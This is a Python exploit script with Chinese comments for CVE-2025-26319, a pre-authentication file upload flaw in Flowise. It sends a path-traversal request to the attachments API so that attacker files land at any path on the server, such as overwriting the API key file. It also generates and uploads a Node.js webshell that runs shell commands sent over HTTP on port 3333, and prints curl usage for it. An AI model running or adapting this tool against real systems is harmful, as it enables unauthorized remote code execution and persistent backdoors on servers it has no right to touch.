#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Flowise Pre-Auth Arbitrary File Upload (CVE-2025-26319) Exploit # Reference: https://medium.com/@attias.dor/the-burn-notice-part-2-5-5-flowise-pre-auth-arbitrary-file-upload-cve-2025-26319-0d4194a34183 import requests import argparse import os import sys import mimetypes from urllib.parse import urljoin def banner(): print(""" ╔════════════════════════════════════════════════════════════════╗ ║ ║ ║ Flowise Pre-Auth Arbitrary File Upload (CVE-2025-26319) ║ ║ ║ ╚════════════════════════════════════════════════════════════════╝ """) def check_target(url): """检查目标是否可能是Flowise实例""" try: # 尝试访问API版本端点,这个端点在白名单中 version_url = urljoin(url, "/api/v1/version") resp = requests.get(version_url, timeout=10) if resp.status_code == 200: print(f"[+] 目标似乎是Flowise实例,版本信息: {resp.text}") return True else: print(f"[!] 目标响应代码: {resp.status_code},可能不是Flowise实例") return False except Exception as e: print(f"[!] 检查目标时出错: {str(e)}") return False def upload_file(url, local_file, target_path): """ 利用CVE-2025-26319上传文件到任意路径 参数: - url: 目标Flowise实例URL - local_file: 要上传的本地文件路径 - target_path: 目标服务器上的路径(包括文件名) """ if not os.path.exists(local_file): print(f"[!] 本地文件不存在: {local_file}") return False # 分解目标路径为目录和文件名 target_dir = os.path.dirname(target_path) target_filename = os.path.basename(target_path) if not target_filename: print("[!] 目标路径必须包含文件名") return False # 构造路径遍历攻击 # 使用一个固定的chatflowId,并在chatId中进行路径遍历 chatflow_id = "exploit" # 构造路径遍历,从存储目录回溯到目标目录 chat_id = f"..{'/..' * 10}/{target_dir.lstrip('/')}" # 使用足够多的..回溯 endpoint = f"/api/v1/attachments/{chatflow_id}/{chat_id}" upload_url = urljoin(url, endpoint) print(f"[*] 上传文件到: {upload_url}") print(f"[*] 目标文件: {target_path}") # 准备文件上传 try: file_content = open(local_file, "rb").read() file_mimetype = mimetypes.guess_type(local_file)[0] or "application/octet-stream" # 构造multipart/form-data请求 files = { "files": (target_filename, file_content, file_mimetype) } # 发送请求 response = requests.post(upload_url, files=files, timeout=30) # 检查响应 if response.status_code in [200, 201]: print(f"[+] 文件上传成功! 状态码: {response.status_code}") print(f"[+] 响应内容: {response.text}") return True else: print(f"[!] 文件上传失败. 状态码: {response.status_code}") print(f"[!] 响应内容: {response.text}") return False except Exception as e: print(f"[!] 上传过程中出错: {str(e)}") return False def check_upload_success(url, target_path): """尝试验证文件是否成功上传""" try: # 这里我们只能基于特定情况进行验证 # 例如,如果上传的是JSON文件到API配置目录 if target_path.endswith('api.json'): api_url = urljoin(url, "/api/v1/apikey") resp = requests.get(api_url) if resp.status_code == 200: print("[+] 成功验证API配置文件被修改!") return True print("[*] 无法直接验证文件上传结果,请手动确认") return None except Exception as e: print(f"[!] 验证过程中出错: {str(e)}") return False def generate_webshell(filename, language): """生成不同语言的简单webshell""" webshells = { "php": """""", "nodejs": """ const http = require('http'); const { exec } = require('child_process'); http.createServer((req, res) => { const cmd = new URL(req.url, `http://${req.headers.host}`).searchParams.get('cmd'); if (cmd) { exec(cmd, (error, stdout, stderr) => { res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end(stdout || stderr || error); }); } else { res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('Ready for commands'); } }).listen(3333); """ } if language not in webshells: print(f"[!] 不支持的语言: {language}") return None with open(filename, 'w') as f: f.write(webshells[language]) print(f"[+] 生成{language}类型webshell: {filename}") return filename def main(): banner() parser = argparse.ArgumentParser(description="Flowise Pre-Auth Arbitrary File Upload (CVE-2025-26319) Exploit") parser.add_argument("-u", "--url", required=True, help="目标Flowise实例URL (例如: http://example.com:3000)") parser.add_argument("-f", "--file", help="要上传的本地文件路径") parser.add_argument("-d", "--destination", help="目标服务器上的文件路径 (例如: /root/.flowise/api.json)") parser.add_argument("--generate-webshell", choices=["php", "nodejs"], help="自动生成指定类型的webshell") parser.add_argument("--webshell-path", help="webshell在服务器上的路径 (使用--generate-webshell时必需)") args = parser.parse_args() # 检查目标是否为Flowise实例 if not check_target(args.url): print("[!] 目标可能不是Flowise实例,是否继续? (y/n)") choice = input().lower() if choice != 'y': sys.exit(1) # 处理webshell生成 if args.generate_webshell: if not args.webshell_path: print("[!] 使用--generate-webshell时必须指定--webshell-path") sys.exit(1) temp_webshell = f"temp_webshell.{args.generate_webshell}" generate_webshell(temp_webshell, args.generate_webshell) # 上传生成的webshell success = upload_file(args.url, temp_webshell, args.webshell_path) # 清理临时文件 os.remove(temp_webshell) if success: if args.generate_webshell == "php": print(f"[+] PHP Webshell上传成功,可通过以下URL访问: {urljoin(args.url, args.webshell_path)}") print(f"[+] 使用方式: curl '{urljoin(args.url, args.webshell_path)}?cmd=id'") elif args.generate_webshell == "nodejs": print(f"[+] Node.js后门脚本上传成功,服务器将尝试在端口3333启动HTTP服务") print(f"[+] 使用方式: curl 'http://目标IP:3333/?cmd=id'") # 处理常规文件上传 elif args.file and args.destination: success = upload_file(args.url, args.file, args.destination) if success: check_upload_success(args.url, args.destination) else: if not (args.generate_webshell and args.webshell_path): print("[!] 必须提供--file和--destination参数,或使用--generate-webshell和--webshell-path") parser.print_help() sys.exit(1) if __name__ == "__main__": main()